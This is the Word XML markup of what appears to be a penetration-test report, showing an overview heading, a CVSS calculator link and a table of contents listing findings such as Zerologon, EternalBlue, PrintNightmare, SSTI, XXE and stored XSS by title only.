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0C3BF351" w:rsidP="0D325B6E" w:rsidRDefault="0C3BF351" w14:paraId="5326379C" w14:textId="231F7959">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1510735849" w:id="756057254"/>
      <w:bookmarkStart w:name="_Toc1754808043" w:id="1747972869"/>
      <w:bookmarkStart w:name="_Toc686114547" w:id="1107741880"/>
      <w:bookmarkStart w:name="_Toc1957379664" w:id="1020264792"/>
      <w:bookmarkStart w:name="_Toc247286221" w:id="559047649"/>
      <w:bookmarkStart w:name="_Toc2031673484" w:id="1282218890"/>
      <w:bookmarkStart w:name="_Toc122893883" w:id="883771228"/>
      <w:bookmarkStart w:name="_Toc37433101" w:id="1063042679"/>
      <w:bookmarkStart w:name="_Toc924737269" w:id="1340260427"/>
      <w:r w:rsidR="0C3BF351">
        <w:rPr/>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="756057254"/>
      <w:bookmarkEnd w:id="1747972869"/>
      <w:bookmarkEnd w:id="1107741880"/>
      <w:bookmarkEnd w:id="1020264792"/>
      <w:bookmarkEnd w:id="559047649"/>
      <w:bookmarkEnd w:id="1282218890"/>
      <w:bookmarkEnd w:id="883771228"/>
      <w:bookmarkEnd w:id="1063042679"/>
      <w:bookmarkEnd w:id="1340260427"/>
    </w:p>
    <w:p w:rsidR="2D27F55D" w:rsidP="0D325B6E" w:rsidRDefault="2D27F55D" w14:paraId="0170949F" w14:textId="225DF1FB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:eastAsia="Noto Sans" w:cs="Noto Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2D27F55D">
        <w:rPr>
          <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:eastAsia="Noto Sans" w:cs="Noto Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Use this to link CVSS scores: </w:t>
      </w:r>
      <w:hyperlink r:id="R30369df608ce43f9">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="2D27F55D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:eastAsia="Noto Sans" w:cs="Noto Sans"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.first.org/cvss/calculator/4-0</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="244B6AEE" w14:textId="7764AF50">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="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2607FB85" w14:textId="1AFF2BF7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="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C689C21" w14:textId="3F3FBF49">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5F53E269" w14:textId="44C00EE5">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52E41A12" w14:textId="0DA9F552">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4A6560A0" w14:textId="51B1C1A4">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1FD412AD" w14:textId="506EB592">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3E5AFB04" w14:textId="1B3A30CC">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69F755A6" w14:textId="0F887479">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390ED6AF" w14:textId="4F73C500">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58682EC" w14:textId="77ED85AB">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E4D0437" w14:textId="1B4479FF">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333287C3" w14:textId="0551A30D">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1A6D810F" w14:textId="20CF1EB4">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1015D90C" w14:textId="7C105718">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4686021D" w14:textId="47BD777A">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0283DD4A" w14:textId="55177BF3">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1840FD8B" w14:textId="31979F58">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29C080CA" w14:textId="2E458311">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:right="0"/>
        <w:jc w:val="righ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E3A790A" w14:textId="3255CEA7">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466215A2" w14:textId="282ACA6A">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54DB8A74" w14:textId="5C6531CD">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29D4EB0D" w14:textId="46EC533E">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1D4832D" w14:textId="7CB10441">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">TOC \o "1-9" \z \u \h</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc1183113632">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Overview</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1183113632 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1C5E36E0" w14:textId="5B6F3699">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1194882016">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>C1: Weak Administrator Credentials</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1194882016 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="25CAD680" w14:textId="6A23C1A5">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1477032834">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>C1: Administrator/Root Password Reuse</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1477032834 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6C9A33BB" w14:textId="13197090">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1928054673">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>C1: Lack of Host-Based Firewall</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1928054673 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3246A155" w14:textId="0ABE0239">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc905455746">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>C1: Server-Side Template Injection in KEY website</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc905455746 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="52986AA1" w14:textId="71B71140">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc499816604">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>C1: Zerologon</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc499816604 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="73613284" w14:textId="29117C33">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc761909968">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>C1: Eternal Blue</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc761909968 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2DADEAF6" w14:textId="586F7AFC">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1760541587">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>C1: noPac</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1760541587 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5ED48937" w14:textId="6A7EE112">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1369058888">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>C1: Public and Unauthenticated AWS S3 Buckets</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1369058888 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="40F8A059" w14:textId="3277A832">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1295551479">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>C1: Cleartext Credentials in Files</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1295551479 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0B017110" w14:textId="56EA06D3">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc910359827">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>C1: JuicyPotato</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc910359827 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5E95FB4D" w14:textId="19A66678">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc974910613">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>C1: Command Injection</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc974910613 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0F649F0F" w14:textId="0BD6E5F5">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc79763299">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>H1: Arbitrary File Upload</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc79763299 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6978367E" w14:textId="21284AAF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1015880590">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>H1: XML External Entity (XXE)</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1015880590 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="58342345" w14:textId="31FADBF9">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1932824404">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>H1: Unpatched Kernel Vulnerability - OverlayFS</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1932824404 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="53A7722A" w14:textId="22592D3A">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc763296172">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>H1: Editable Scheduled Task Running as Administrator</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc763296172 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="237CB2DF" w14:textId="05485B1B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1384456253">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>H1: PrintNightmare</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1384456253 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="35B76AD6" w14:textId="3AF70759">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1187293515">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>H1: Exposed SSH Keys</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1187293515 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4BDED1B3" w14:textId="468CF4F2">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc2124300727">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>H1: Stored Cross Site Scripting</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc2124300727 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
